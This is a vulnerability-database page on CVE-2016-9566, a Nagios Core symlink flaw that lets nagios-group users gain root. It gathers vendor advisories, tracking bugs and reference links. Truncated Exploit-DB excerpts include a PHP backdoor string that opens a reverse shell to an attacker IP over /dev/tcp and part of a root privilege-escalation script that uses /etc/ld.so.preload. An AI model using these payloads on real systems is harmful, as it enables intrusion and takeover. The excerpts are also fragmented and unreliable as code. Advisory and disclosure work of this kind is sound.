CVE-2016-9566
published 2016-12-15CVE-2016-9566: base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the…
PriorityP351high7.8CVSS 3.0
AVLACLPRLUINSUCHIHAH
EXPLOIT
EPSS
4.88%
91.0th percentile
base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios | <= 4.2.3 | — |
CVSS provenance
nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv9.8CRITICAL
vendor_redhat9.8CRITICAL
vendor_ubuntu5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Nagios regression
vendor_ubuntu·2017-06-07·CVSS 5.5
[MEDIUM] Nagios regression
Title: Nagios regression
Summary: USN-3253-1 introduced a regression in Nagios.
USN-3253-1 fixed vulnerabilities in Nagios. The update prevented log files
from being displayed in the web interface. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
It was discovered that Nagios incorrectly handled certain long strings. A
remote authenticated attacker could use this issue to cause Nagios to
crash, resulting in a denial of service, or possibly obtain sensitive
information. (CVE-2013-7108, CVE-2013-7205)
It was discovered that Nagios incorrectly handled certain long messages to
cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to
crash, resulting in a denial of service. (CVE-2014-1878)
Dawid Golunski discovered that Nagi
Ubuntu
Nagios vulnerabilities
vendor_ubuntu·2017-04-03·CVSS 5.5
CVE-2013-7108 [MEDIUM] Nagios vulnerabilities
Title: Nagios vulnerabilities
Summary: Several security issues were fixed in Nagios.
It was discovered that Nagios incorrectly handled certain long strings. A
remote authenticated attacker could use this issue to cause Nagios to
crash, resulting in a denial of service, or possibly obtain sensitive
information. (CVE-2013-7108, CVE-2013-7205)
It was discovered that Nagios incorrectly handled certain long messages to
cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to
crash, resulting in a denial of service. (CVE-2014-1878)
Dawid Golunski discovered that Nagios incorrectly handled symlinks when
accessing log files. A local attacker could possibly use this issue to
elevate privileges. In the default installation of Ubuntu, this should be
prevented by the Yama link r
Red Hat
nagios: Privilege escalation issue
vendor_redhat·2016-12-07·CVSS 9.8
CVE-2016-9566 [CRITICAL] CWE-59 nagios: Privilege escalation issue
nagios: Privilege escalation issue
base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.
A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the 'nagios' user/group) could use this flaw to elevate their privileges to root.
Package: nagios (Red Hat Mobile Application Platform 4) - Affected
Package: nagios (Red Hat OpenStack Platform 10 (Newton)) - Not affected
Package: nagios (Red Hat OpenStack Platform 8 (Liberty)) - Not affected
Package: nagios (Red Hat OpenStack Platform 9 (Mitaka)) - Not affected
GHSA
GHSA-9332-j4wp-2xcq: base/logging
ghsa_unreviewed·2022-05-14·CVSS 9.8
CVE-2016-9566 [CRITICAL] CWE-59 GHSA-9332-j4wp-2xcq: base/logging
base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.
OSV
nagios3 regression
osv·2017-06-07·CVSS 5.5
CVE-2013-7108 [MEDIUM] nagios3 regression
nagios3 regression
USN-3253-1 fixed vulnerabilities in Nagios. The update prevented log files
from being displayed in the web interface. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
It was discovered that Nagios incorrectly handled certain long strings. A
remote authenticated attacker could use this issue to cause Nagios to
crash, resulting in a denial of service, or possibly obtain sensitive
information. (CVE-2013-7108, CVE-2013-7205)
It was discovered that Nagios incorrectly handled certain long messages to
cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to
crash, resulting in a denial of service. (CVE-2014-1878)
Dawid Golunski discovered that Nagios incorrectly handled symlinks when
accessing log files. A lo
OSV
nagios3 vulnerabilities
osv·2017-04-03·CVSS 5.5
CVE-2013-7108 [MEDIUM] nagios3 vulnerabilities
nagios3 vulnerabilities
It was discovered that Nagios incorrectly handled certain long strings. A
remote authenticated attacker could use this issue to cause Nagios to
crash, resulting in a denial of service, or possibly obtain sensitive
information. (CVE-2013-7108, CVE-2013-7205)
It was discovered that Nagios incorrectly handled certain long messages to
cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to
crash, resulting in a denial of service. (CVE-2014-1878)
Dawid Golunski discovered that Nagios incorrectly handled symlinks when
accessing log files. A local attacker could possibly use this issue to
elevate privileges. In the default installation of Ubuntu, this should be
prevented by the Yama link restrictions. (CVE-2016-9566)
OSV
CVE-2016-9566: base/logging
osv·2016-12-15·CVSS 9.8
CVE-2016-9566 [CRITICAL] CVE-2016-9566: base/logging
base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.
No detection rules found.
Exploit-DB
Nagios < 4.2.2 - Arbitrary Code Execution
exploitdb·2016-12-15·CVSS 9.8
CVE-2016-9565 [CRITICAL] Nagios < 4.2.2 - Arbitrary Code Execution
Nagios /dev/tcp/192.168.57.3/8080 0&1 &'"); ?> is not blacklisted
#
# which will do the trick as it won't mess up the payload :)
self.add_header('Server', backdoor)
# Return XML/feed with JavaScript payload that will run the backdoor code from nagios-backdoor.php via tag :)
print "[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :) \n"
self.write(xmldata)
self.finish()
tornado.ioloop.IOLoop.instance().stop()
if __name__ == "__main__":
global backdoor_path
global backdoor
print intro
# Set attacker's external IP & port to be used by the reverse shell
if len(sys.argv) /dev/tcp/%s/%s 0&1 &'"); die("stop processing"); ?>""" % (attacker_ip, attacker_port)
# Feed XML containing JavaScript payload that will load the nagios
Exploit-DB
Nagios < 4.2.4 - Local Privilege Escalation
exploitdb·2016-12-15·CVSS 9.8
CVE-2016-9566 [CRITICAL] Nagios < 4.2.4 - Local Privilege Escalation
Nagios /etc/ld.so.preload
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}
function ctrl_c() {
echo -e "\n[+] Ctrl+C pressed"
cleanexit 0
}
#intro
echo -e "\033[94m \nNagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566) \nnagios-root-privesc.sh (ver. 1.0)\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"
# Priv check
echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"
id | grep -q nagios
if [ $? -ne 0 ]; then
echo -e "\n[!] You need to execute the exploit as 'nagios' user or 'nagios' group ! Exiting.\n"
exit 3
fi
# Set target paths
ERRORLOG="$1"
if [ ! -f "$ERRORLOG" ]; then
echo -e "\n[!] Provided Nagios log path ($ERRORLOG) doesn't exist. Try again. E.g: \n"
echo -e "./nagios-root-privesc.sh /usr/local
Bugzilla
CVE-2016-9566 nagios: Privilege escalation issue [fedora-all]
bugzilla·2016-12-08·CVSS 7.8
CVE-2016-9566 [HIGH] CVE-2016-9566 nagios: Privilege escalation issue [fedora-all]
CVE-2016-9566 nagios: Privilege escalation issue [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions of Fedora. While on
Bugzilla
CVE-2016-9566 nagios: Privilege escalation issue
bugzilla·2016-12-08·CVSS 7.8
CVE-2016-9566 [HIGH] CVE-2016-9566 nagios: Privilege escalation issue
CVE-2016-9566 nagios: Privilege escalation issue
An unsafe file opening/creation of logging files that can be misused for root privilege escalation was found in base/logging.c.
Upstream patch:
https://github.com/NagiosEnterprises/nagioscore/commit/c29557dec91eba2306f5fb11b8da4474ba63f8c4
Discussion:
Created nagios tracking bugs for this issue:
Affects: fedora-all [bug 1402870]
Affects: epel-all [bug 1402871]
---
An openshift user account is required to get access to the RHMAP Monitoring with Nagios, ref:
https://access.redhat.com/documentation/en/red-hat-mobile-application-platform/4.2/paged/operations-guide/chapter-1-monitoring-rhmap-with-nagios#retrieving-nagios-login-credentials
---
External Reference:
https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-
Bugzilla
CVE-2016-9566 nagios: Privilege escalation issue [epel-all]
bugzilla·2016-12-08·CVSS 7.8
CVE-2016-9566 [HIGH] CVE-2016-9566 nagios: Privilege escalation issue [epel-all]
CVE-2016-9566 nagios: Privilege escalation issue [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions of Fedora EPEL.
arXiv
Extended Abstract: Mimicry Resilient Program Behavior Modeling with LSTM based Branch Models
arxiv_fulltext·2018-03-24
Extended Abstract: Mimicry Resilient Program Behavior Modeling with LSTM based Branch Models
Extended Abstract: Mimicry Resilient Program Behavior Modeling \ LSTM based Branch Models
Hayoon Yi11,
Gyuwan Kim1,21,
Jangho Lee1,
Sunwoo Ahn1,
Younghan Lee1,
Sungroh Yoon12,
Yunheung Paek12
1Dept. of Electrical and Computer Engineering, Seoul National University
2Search Solutions, Inc
Email: hyyi,kgwmath,ubuntu,swahn,yhlee,sryoon,[email protected]
1: Equal Contribution,
2: Corresponding Author
## Abstract
In the software design, protecting a computer system from a plethora of software attacks or malware in the wild has been increasingly important. One branch of research to detect the existence of attacks or malware, there has been much work focused on modeling the runtime behavior of a program. Stemming from the seminal work of Forrest et al., one of the main tools to model program
http://rhn.redhat.com/errata/RHSA-2017-0211.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0212.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0213.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0214.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0258.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0259.htmlhttp://seclists.org/fulldisclosure/2016/Dec/58http://www.securityfocus.com/bid/94919http://www.securitytracker.com/id/1037487https://bugzilla.redhat.com/show_bug.cgi?id=1402869https://github.com/NagiosEnterprises/nagioscore/commit/c29557dec91eba2306f5fb11b8da4474ba63f8c4https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.htmlhttps://lists.debian.org/debian-lts-announce/2018/12/msg00014.htmlhttps://security.gentoo.org/glsa/201612-51https://security.gentoo.org/glsa/201702-26https://security.gentoo.org/glsa/201710-20https://www.exploit-db.com/exploits/40921/https://www.nagios.org/projects/nagios-core/history/4x/http://rhn.redhat.com/errata/RHSA-2017-0211.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0212.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0213.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0214.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0258.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0259.htmlhttp://seclists.org/fulldisclosure/2016/Dec/58http://www.securityfocus.com/bid/94919http://www.securitytracker.com/id/1037487https://bugzilla.redhat.com/show_bug.cgi?id=1402869https://github.com/NagiosEnterprises/nagioscore/commit/c29557dec91eba2306f5fb11b8da4474ba63f8c4https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.htmlhttps://lists.debian.org/debian-lts-announce/2018/12/msg00014.htmlhttps://security.gentoo.org/glsa/201612-51https://security.gentoo.org/glsa/201702-26https://security.gentoo.org/glsa/201710-20https://www.exploit-db.com/exploits/40921/https://www.nagios.org/projects/nagios-core/history/4x/
2016-12-15
Published